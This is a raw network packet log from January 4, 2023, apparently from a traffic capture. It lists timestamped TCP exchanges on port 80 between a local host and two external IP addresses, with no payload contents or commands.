Jan 4, 2023 16:47:26.602686882 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602705956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602721930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602735043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602762938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602781057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602811098 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602823019 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602838993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602855921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602881908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602885962 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602915049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602935076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602941990 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602955103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602971077 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.602973938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.602998972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.603014946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.614557981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614583969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614603996 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614624023 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614643097 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614661932 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614681005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614712954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614732981 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614756107 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614780903 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614804983 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614819050 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.614830971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614859104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614882946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614905119 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614912033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.614928961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:26.614942074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.614969015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:26.615011930 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:27.555819035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:27.555917025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:27.582277060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:27.582340956 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:27.846497059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:27.846796036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.325135946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.325268030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.351525068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.351644039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.351656914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.351742029 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.351762056 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.351809978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.351846933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.351918936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.377973080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378034115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378070116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378202915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378221035 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378257036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378257990 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378309011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378338099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378343105 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378355980 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378371954 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378377914 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378432035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378462076 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:36.378573895 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378667116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378782034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378817081 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.378977060 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404347897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404405117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404508114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404665947 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404702902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404755116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404894114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.404966116 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405090094 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405209064 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405371904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405489922 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405523062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405622005 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405771971 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.405848980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.406063080 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.406136036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.406209946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.478466988 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:36.478653908 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:37.378124952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.395371914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.395498991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.397562027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.414400101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.933851957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.933953047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934026003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934096098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934165001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934237003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934307098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934333086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934376955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934421062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934449911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934463978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934524059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934529066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934596062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934604883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934672117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934675932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934751034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934775114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934843063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934849024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934914112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934919119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.934979916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.934992075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.935076952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.935228109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.935297966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.935328960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.935367107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.935370922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.935435057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.935498953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936038017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936090946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936113119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936131001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936188936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936213970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936260939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936280012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936327934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936819077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936889887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936944008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.936958075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.936994076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.937031031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.937035084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.937110901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.937633038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.937707901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.937721968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.937788963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.951910019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.951953888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.951983929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952016115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952157974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.952157974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.952214956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952246904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952275038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.952277899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952311039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.952313900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.952327013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.952361107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.953083992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953119993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953152895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953183889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953187943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.953243017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.953243017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.953283072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.953892946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953924894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953950882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.953979969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.954000950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.954030991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.954132080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:37.954611063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:37.954715967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.086235046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086289883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086311102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086330891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086350918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086438894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.086503983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.086513996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086534023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086551905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086570024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086572886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.086589098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.086611032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.086656094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.087533951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.087567091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.087587118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.087605953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.087625027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.087655067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.087655067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.087692976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.088426113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.088455915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.088475943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.088495016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.088514090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.088527918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.088557005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.088571072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.089330912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.089359045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.089379072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.089396000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.089437962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.089437962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.089469910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.242862940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.242930889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.242975950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243026018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243074894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243091106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243091106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243122101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243169069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243170977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243195057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243221045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243249893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243268013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243274927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.243315935 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.243396997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244020939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.244074106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.244122028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.244146109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244146109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244168997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.244189978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244220018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.244232893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244278908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.244987011 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245098114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245116949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.245147943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245151043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.245198965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245208025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.245248079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245256901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.245305061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.245872974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245925903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245974064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.245974064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246012926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246023893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.246042967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246073008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.246109962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246140003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246839046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.246890068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.246933937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.246973991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246973991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.246982098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247023106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247031927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247065067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247113943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247757912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247807980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247853994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247865915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247865915 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247901917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247920990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.247952938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.247982979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.248008966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.248729944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.248780966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.248826981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.248846054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.248873949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.248884916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.248884916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.248925924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.248948097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249000072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249617100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.249666929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.249716043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.249749899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249749899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249764919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.249794006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249815941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.249850035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.249882936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.250520945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.250571966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.250621080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.250667095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.250670910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.250741005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.250760078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.250761032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.250819921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.251477957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.251528978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.251575947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.251605988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.251626015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.251676083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.251780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.251780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.251780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.252393007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.252489090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.252536058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.252557039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.252568960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.252604008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.252877951 CET	49696	80	192.168.2.4	66.235.200.147
